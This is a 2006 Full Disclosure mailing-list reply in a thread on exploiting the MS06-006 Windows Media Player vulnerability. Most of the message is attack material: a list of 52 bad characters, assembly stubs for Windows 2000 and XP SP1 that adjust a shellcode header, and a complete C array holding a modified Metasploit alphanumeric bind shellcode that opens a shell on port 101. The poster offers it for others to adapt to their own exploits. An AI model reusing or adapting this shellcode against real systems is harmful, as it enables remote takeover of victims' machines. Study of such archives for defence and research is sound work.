Full Disclosure mailing list archives

Re: MS06-06 Windows Media Player Exploitation

From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Thu, 16 Feb 2006 23:54:50 +0100

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
if you try the shellcode this wont work of course because its made in
another exploitation environment, but at least if you are in the same
case you can try to do via this method, depending of your current
registers and modding the shellcode header to feat with your
vulnerability environment where the metasploit project can't mod this
"locked" header.

hope it helps.


ad () heapoverflow com wrote:

not sure about what you are looking for but read this below , it's
from an unpublished poc where I had to trick with 52 badchars:

-
--------------------------------------------------------------------------------------------
 52 BADCHARS:

0x00 0x22 0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x70 0x71
0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79 0xE0 0xE1 0xE2 0xE3 0xE4
0xE5 0xE6 0xE7 0xE8 0xE9 0xEA 0xEB 0xEC 0xED 0xEE 0xEF 0xF0 0xF1
0xF2 0xF3 0xF4 0xF5 0xF6 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFF


Due to the high number of bad chars, especially an upper/lower case
 conflict, I have used the msf bind shellcode port 101 with the
PexAlphaNum encoder.

EB 03            JMP SHORT 0012EE63 59               POP ECX EB 05
JMP SHORT 0012EE68 E8 F8FFFFFF      CALL 0012EE60

But it contains 7 bad chars as you can see, so another way is (for
2k):


83C3 1C          ADD EBX,1C 53               PUSH EBX 59
POP ECX

Because ebx+1c is a fixed addr pointing were the alphanum shellcode
 starts, and so on, is popped to ecx correctly, and 0 badchars.

And the one for XP sp1 (because no more direct pointer where I
need, but I found near the dword of a reg):

834424 08 1C     ADD DWORD PTR SS:[ESP+8],1C 895C24 08        MOV
EBX,DWORD PTR SS:[ESP+8] 53               PUSH EBX 59
POP ECX

-
------------------------------------------------------------------------------------------------


/*modded metasploit bindshellcode port 101*/ char scode1[]=
"\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59" /*upon this text is the
modded header for 2k, it changes depending the OS you exploit, read
my exploit's header or debug for much informations, this is how I
trick with 52 badchars... thks to msf guys for all the rest, this
is a great alphanum uppercase shellcode really appreciated here
:)*/ "\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"
"\x4e\x36\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48"
"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x42\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x54"
"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x58\x4e\x56\x46\x32\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d"
"\x46\x36\x4b\x48\x43\x44\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x38"
"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x44\x4a\x50\x50\x55\x4a\x36"
"\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x57"
"\x44\x53\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x35\x43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x42\x30"
"\x45\x56\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d"
"\x42\x45\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x36\x43\x56"
"\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x45\x49\x45\x49\x52\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x44\x4e\x52"
"\x43\x49\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x35\x44\x45\x41\x55\x41\x35\x41\x35\x4c\x46"
"\x41\x30\x41\x55\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
"\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";


c0ntex wrote:

No exploit, just some basic research - anyone with 100% Ascii
win32

shellcode?

http://open-security.org/winmedia/index.html

--

regards c0ntex _______________________________________________
Full-Disclosure - We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted
and sponsored by Secunia - http://secunia.com/



_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ/UCuq+LRXunxpxfAQKbRhAAg36gK/tnR1g8BZ+IijjF6SbdSlynx9/H
uWDItyVcOmwvW7asCIH9HQ+xxT/P1oeBsCFL+tSGT4GBDiTEsv65j6kJVnMCeCTc
f2v/cO9bm76Nq1SCBwNECcZvpzl0zpZ8ViU/ty1wHJVKtql45xLEJhKTpH6Cb049
OaqQhxIIqlLGZ+MwVjcG8RpK8bJnCOV38NU0tZqzp8POYSXuOaAtrIwI1BD+CECd
Xl+NwOZ4xBF4RZz0xchvH+CxmWwW5K8tDoENc9Qre4LXdSCO9juBBA3KTuPW+uq9
6+5FbiHFcNWHwTU1WvHWTEmUNGAnDwr8sgI648nbFvbhtlbwbXnT4+RoK4gd3cSl
0H91/BEnCCleAwXB6pjw5B15S5Z13ffVZTaPkVEsp21t59TC7mPpKuJ4L5GRR0Ku
bkLD7MWzypyp8LBLtT0HiVAKyNviqJD8t5utXz62UHZdpYrumZFTpzwwQ9ntslxw
qDAVYS5bHgF31p4TjkNog+4GsA8QnZ831qn7vTGAlPjSacocu5hi3nJEDb8PcndP
BcT7awGKO9RlvPfDOkiwEnZdW6pIzIeDmHb9Qc/DI80UwfPtw8+4xG0rgEG5mLpz
DxAyiPdOTf36K7wIWKmin4lU5/AyAlU1QhXziMlj+xuot/0TPjDGOJkVDCXIUneY
8S5UI5tiDww=
=tYT1
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
  - Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
  - Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
    - Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
    - Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] Matthew Murphy (Feb 17)
    - Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
    - Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
    - Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
    - Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)